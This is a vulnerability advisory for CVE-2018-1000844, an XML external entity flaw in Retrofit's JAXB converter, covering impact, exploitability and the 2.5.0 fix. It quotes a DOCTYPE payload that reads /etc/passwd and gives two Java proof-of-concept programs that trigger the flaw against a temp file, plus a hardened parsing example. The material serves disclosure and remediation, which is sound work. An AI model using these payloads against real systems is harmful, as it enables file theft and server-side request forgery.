CVE-2018-1000844
XML External Entity (XXE) vulnerability in com.squareup.retrofit2:retrofit
What is CVE-2018-1000844 About?
This vulnerability is an XML External Entity (XXE) flaw in Square Open Source Retrofit versions prior to commit 4a693c5aeeef2be6c7ecf80e7b5ec79f6ab59437, specifically in the JAXB converter that unmarshals XML response bodies. Retrofit is an HTTP client library, so the crafted XML arrives in a response: whoever controls the server the client talks to, or can tamper with the response in transit, can make the client read files from its own file system and hand back their contents, or make the client issue requests to other hosts (Server-Side Request Forgery). Exploitation is straightforward once the attacker can get the Retrofit user to parse a crafted XML document.
Affected Software
- com.squareup.retrofit2:retrofit (JAXB converter), versions before 2.5.0
Technical Details
The JAXB converter in Square Open Source Retrofit versions prior to commit 4a693c5aeeef2be6c7ecf80e7b5ec79f6ab59437 is vulnerable to XML External Entity (XXE) attacks. Before the fix, the converter hands the response body straight to a JAXB `Unmarshaller`, and the SAX parser JAXB uses by default honours `DOCTYPE` declarations and resolves external general entities, so nothing stops an attacker-supplied document from declaring one. A minimal payload declares the entity, for example `<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>`, and then references it as `&xxe;` inside an element that the client's model maps to a string field. When the vulnerable Retrofit client unmarshals this response, the parser reads `/etc/passwd` from the client's file system and places its contents in the mapped field, where application code, logging or an error message may expose it. Using an `http://` or `ftp://` URL as the `SYSTEM` identifier makes the client connect to the named host instead, which yields SSRF from the client's network position; as with any parser that also loads external DTDs, an attacker-hosted DTD with parameter entities can exfiltrate the file contents out of band even when the application never displays the field. The fix creates the parser explicitly through a StAX `XMLInputFactory` whose `IS_SUPPORTING_EXTERNAL_ENTITIES` and `SUPPORT_DTD` properties are set to `false`, and passes the resulting `XMLStreamReader` to the unmarshaller, so a `DOCTYPE` is refused before any entity can be resolved.
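The two parsing paths described above, side by side, as an added example that is not Retrofit's code and not the linked PoC. `Item`, `xxeDocument`, `unmarshalUnsafe` and `unmarshalSafe` are names chosen for this illustration; the hardened path uses the same `XMLInputFactory` settings as the Retrofit fix. The "secret" file is constructed in a temp directory so the program runs offline without reading `/etc/passwd`. It assumes JAXB is on the classpath (bundled with JDK 8; on JDK 11 and later add `javax.xml.bind:jaxb-api` plus an implementation such as `org.glassfish.jaxb:jaxb-runtime`).

```java
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.bind.JAXBContext;
import javax.xml.bind.Unmarshaller;
import javax.xml.bind.annotation.XmlRootElement;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamReader;

/**
 * Added example (not Retrofit's code): unmarshalling untrusted XML straight from
 * a Reader versus going through a StAX reader with DTD and external-entity
 * support switched off, the approach the Retrofit fix takes.
 */
public class XxeDemo {

  // Hypothetical response model, standing in for a real API's JAXB-mapped type.
  @XmlRootElement(name = "item")
  public static class Item {
    public String name;
  }

  // Constructed attacker document: declares an external entity that points at a
  // local file and references it inside the element mapped to Item.name.
  static String xxeDocument(Path target) {
    return "<?xml version=\"1.0\"?>\n"
        + "<!DOCTYPE item [<!ENTITY xxe SYSTEM \"" + target.toUri() + "\">]>\n"
        + "<item><name>&xxe;</name></item>";
  }

  // Pre-fix shape: JAXB builds its own SAX parser, which honours the DOCTYPE and
  // resolves the external entity, so the file's contents land in Item.name.
  static String unmarshalUnsafe(String xml) throws Exception {
    Unmarshaller u = JAXBContext.newInstance(Item.class).createUnmarshaller();
    Item item = (Item) u.unmarshal(new StringReader(xml));
    return item.name;
  }

  // Hardened shape: create the parser ourselves with DTDs and external entities
  // disabled and let JAXB consume the stream reader. The parser now refuses the
  // DOCTYPE (or leaves &xxe; undeclared); either way no file or URL is fetched.
  static String unmarshalSafe(String xml) throws Exception {
    XMLInputFactory factory = XMLInputFactory.newInstance();
    factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
    factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
    XMLStreamReader reader = factory.createXMLStreamReader(new StringReader(xml));
    Unmarshaller u = JAXBContext.newInstance(Item.class).createUnmarshaller();
    return u.unmarshal(reader, Item.class).getValue().name;
  }

  public static void main(String[] args) throws Exception {
    // Constructed secret so the demo is self-contained; a real attacker would
    // name /etc/passwd, a keystore, or an application config file here.
    Path secret = Files.createTempFile("xxe-demo", ".txt");
    Files.write(secret, "s3cr3t-token".getBytes(StandardCharsets.UTF_8));
    String xml = xxeDocument(secret);

    System.out.println("unsafe -> " + unmarshalUnsafe(xml));
    try {
      System.out.println("safe   -> " + unmarshalSafe(xml));
    } catch (Exception e) {
      System.out.println("safe   -> rejected: " + e.getClass().getSimpleName());
    }
    Files.deleteIfExists(secret);
  }
}
```

The important design point is who constructs the parser: when JAXB is handed a `Reader`, it picks the platform SAX parser with its permissive defaults, whereas handing it an `XMLStreamReader` makes the caller's `XMLInputFactory` settings authoritative. Disabling `SUPPORT_DTD` also removes the entity-expansion denial-of-service vector, not only the external-entity one.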
What is the Impact of CVE-2018-1000844?
Successful exploitation lets whoever supplies the XML (a malicious or compromised server, or a network attacker able to modify the response) read any file the client process can open and have its contents returned in a mapped field or exfiltrated out of band, make the client issue requests to internal or external hosts (SSRF) from the client's own network position, and, because DTD processing is enabled, exhaust memory or CPU through recursive entity expansion (denial of service). For an Android app the readable files are on the device; for a backend service that uses Retrofit to call other APIs they are on the server, where they commonly include credentials and configuration.
What is the Exploitability of CVE-2018-1000844?
Exploitation requires the attacker to get a vulnerable Retrofit client to parse a crafted XML response through the JAXB converter. That means the attacker is the server, controls a server the client calls (including a compromised or malicious third-party API), or can alter the response in transit, which is realistic over plaintext HTTP or where certificate validation is broken. The application's own inbound endpoints are not the attack surface: a service that merely receives XML from its callers is not affected by this CVE unless it relays that XML to the converter. No credentials for the victim application are needed beyond that position, and the payload is a single `DOCTYPE` declaration plus an entity reference, so complexity is low. This is a remote vulnerability. The likelihood of exploitation increases when the client talks to partner-operated or user-configurable XML APIs, when responses travel unauthenticated, and when the unmarshalled fields are echoed back, logged or placed in error messages where leaked file contents can be read.
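The attack model described above, as an added example that is not Retrofit's code and not the linked PoC: a constructed malicious API is stood up with OkHttp's `MockWebServer`, and a Retrofit client using the JAXB converter is pointed at it, so the entity resolves on the client side. `Api`, `Item` and the class name are chosen for this illustration. Assumed dependencies: `com.squareup.retrofit2:retrofit` and `com.squareup.retrofit2:converter-jaxb` (a version in the affected range to reproduce, 2.5.0 to observe the fix), `com.squareup.okhttp3:mockwebserver`, and JAXB on the classpath (JDK 8, or `jaxb-api` plus `jaxb-runtime` on JDK 11 and later).

```java
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.bind.annotation.XmlRootElement;
import okhttp3.mockwebserver.MockResponse;
import okhttp3.mockwebserver.MockWebServer;
import retrofit2.Call;
import retrofit2.Response;
import retrofit2.Retrofit;
import retrofit2.converter.jaxb.JaxbConverterFactory;
import retrofit2.http.GET;

/**
 * Added example (not Retrofit's code): the server is the attacker. A canned
 * XXE response is served to a Retrofit client using JaxbConverterFactory, and
 * the program reports whether the client leaked one of its own local files.
 */
public class RetrofitXxeCheck {

  // Hypothetical response model the client expects from the API.
  @XmlRootElement(name = "item")
  public static class Item {
    public String name;
  }

  // Hypothetical Retrofit service interface.
  interface Api {
    @GET("item")
    Call<Item> item();
  }

  public static void main(String[] args) throws Exception {
    // Constructed local secret so the run is self-contained and harmless.
    Path secret = Files.createTempFile("retrofit-xxe", ".txt");
    Files.write(secret, "client-side-secret".getBytes(StandardCharsets.UTF_8));

    // The malicious server's response: the entity is resolved by the CLIENT's
    // parser, against the CLIENT's file system.
    String body = "<?xml version=\"1.0\"?>\n"
        + "<!DOCTYPE item [<!ENTITY xxe SYSTEM \"" + secret.toUri() + "\">]>\n"
        + "<item><name>&xxe;</name></item>";

    MockWebServer server = new MockWebServer();
    server.enqueue(new MockResponse()
        .addHeader("Content-Type", "application/xml")
        .setBody(body));
    server.start();
    try {
      Api api = new Retrofit.Builder()
          .baseUrl(server.url("/"))
          .addConverterFactory(JaxbConverterFactory.create())
          .build()
          .create(Api.class);

      try {
        Response<Item> response = api.item().execute();
        String name = response.body() == null ? null : response.body().name;
        if (name != null && name.contains("client-side-secret")) {
          System.out.println("VULNERABLE: server-supplied XML leaked a local file on the client");
        } else {
          System.out.println("entity not expanded; field = " + name);
        }
      } catch (RuntimeException e) {
        // A fixed converter parses with DTD support off, so the DOCTYPE should be
        // refused and the parser error surfaces instead of an expanded entity.
        System.out.println("FIXED: response rejected (" + e.getCause() + ")");
      }
    } finally {
      server.shutdown();
      Files.deleteIfExists(secret);
    }
  }
}
```

Run it once against the dependency versions actually resolved in your build rather than the ones declared; a transitive pin or a BOM can keep an old `converter-jaxb` on the classpath after `retrofit` itself has been bumped, and this check catches that.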
What are the Known Public Exploits?
| PoC Author | Link | Commentary |
|---|---|---|
| epicosy | Link | retrofit with CVE-2018-1000844 |
What are the Available Fixes for CVE-2018-1000844?
Available Upgrade Options
- com.squareup.retrofit2:retrofit
- >2.0.0, <2.5.0 → Upgrade to 2.5.0
The fix lives in the JAXB converter, so move `converter-jaxb` to the same version as `retrofit`. If an upgrade is not possible, replace `JaxbConverterFactory` with your own `Converter.Factory` that unmarshals from an `XMLStreamReader` created by an `XMLInputFactory` with `IS_SUPPORTING_EXTERNAL_ENTITIES` and `SUPPORT_DTD` set to `false`, rather than handing the response body directly to a JAXB `Unmarshaller`.
What are Similar Vulnerabilities to CVE-2018-1000844?
Similar Vulnerabilities: CVE-2017-1000487, CVE-2017-10350, CVE-2017-15707, CVE-2018-11776, CVE-2019-10086
